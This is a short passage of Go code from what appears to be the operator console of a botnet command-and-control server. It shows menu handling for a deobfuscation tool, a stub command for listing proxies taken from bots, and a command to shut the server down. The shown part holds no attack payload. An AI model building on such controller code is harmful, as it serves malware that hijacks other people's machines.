						fmt.Println("DEOBFUSCATED: " + deobfuscate(scan.Text()))
					case "exit":
						goto Start
					case "exit-force":
						os.Exit(0)
					default:
						fmt.Println("[!] Unknown Tool! [!]")
					}
				}
			case "listproxys": //List all the aviviable proxys from bots
			//Show count, have filters by country... maybe ping?
			case "exit": //Kills C&C Server
				os.Exit(0)
			default:
				fmt.Println("[!] Unknown Command! Type 'help' for a list of commands. [!]")
			}
		}
	} else {
		os.Exit(0)
	}
}
